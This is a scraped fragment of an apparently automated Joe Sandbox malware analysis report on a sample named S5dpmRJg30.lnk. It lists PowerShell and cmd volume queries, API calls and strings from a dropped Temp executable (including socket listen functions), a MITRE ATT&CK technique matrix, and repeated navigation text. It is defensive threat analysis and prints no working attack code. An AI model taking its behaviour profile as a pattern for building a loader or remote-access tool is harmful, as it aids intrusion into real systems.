Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.27629.0_x64__8wekyb3d8bbwe VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.27323.0_x64__8wekyb3d8bbwe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A3E59A GetLocalTime,

5_2_00A3E59A

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A3E5F8 GetUserNameW,

5_2_00A3E5F8

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A1BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

5_2_00A1BCF2

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_009E5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_009E5D78

Source: a.exe	Binary or memory string: WIN_81
Source: a.exe	Binary or memory string: WIN_XP
Source: a.exe, 00000005.00000003.1312502103.0000000001515000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_XPJ
Source: a.exe.2.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: a.exe	Binary or memory string: WIN_XPe
Source: a.exe	Binary or memory string: WIN_VISTA
Source: a.exe	Binary or memory string: WIN_7
Source: a.exe	Binary or memory string: WIN_8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A62163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		5_2_00A62163
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A61B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		5_2_00A61B61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	112 Process Injection	1 DLL Side-Loading	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Masquerading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	112 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
S5dpmRJg30.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report S5dpmRJg30.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
S5dpmRJg30.lnk